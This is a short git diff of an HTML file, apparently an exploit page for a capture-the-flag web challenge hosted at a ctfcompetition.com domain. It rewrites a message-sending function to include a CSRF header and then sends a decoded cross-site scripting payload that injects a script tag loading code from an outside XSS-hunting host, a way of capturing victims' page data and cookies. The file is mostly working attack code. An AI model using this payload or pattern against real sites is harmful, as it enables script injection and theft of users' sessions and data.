--- a/xss1.html
+++ b/xss1.html
@@ -5,14 +5,19 @@ csrf_header = new Headers();
 csrf_header.append('CSRF-Protection', '1');
 
 function sendMessage(msg) {
-  var url = 'https://joe.web.ctfcompetition.com/message?msg=' + encodeURIComponent(msg)
-  if (window.last_recaptcha_widget !== undefined) {
-    url += '&captcha=' + encodeURIComponent(grecaptcha.getResponse(window.last_recaptcha_widget));
-    delete window.last_recaptcha_widget;
-  }
-  fetch(url, {headers: csrf_header, credentials: 'include', method: 'get'});
+  var u = 'https://joe.web.ctfcompetition.com/message?msg=' + encodeURIComponent(msg);
+  $.ajax({ 
+   type : "GET", 
+   url : u, 
+   beforeSend: function(xhr){xhr.setRequestHeader('CSRF-Protection', '1');},
+   success : function(result) { 
+       //set your variable to the result 
+   }, 
+   error : function(result) { 
+     //handle the error 
+   } 
+   });
 }
- 
 sendMessage("let me rename you");
 var a= decodeURI('%22%3E%3Cscript%20src=https://hrj.xss.ht%3E%3C/script%3E');
 sendMessage(a);
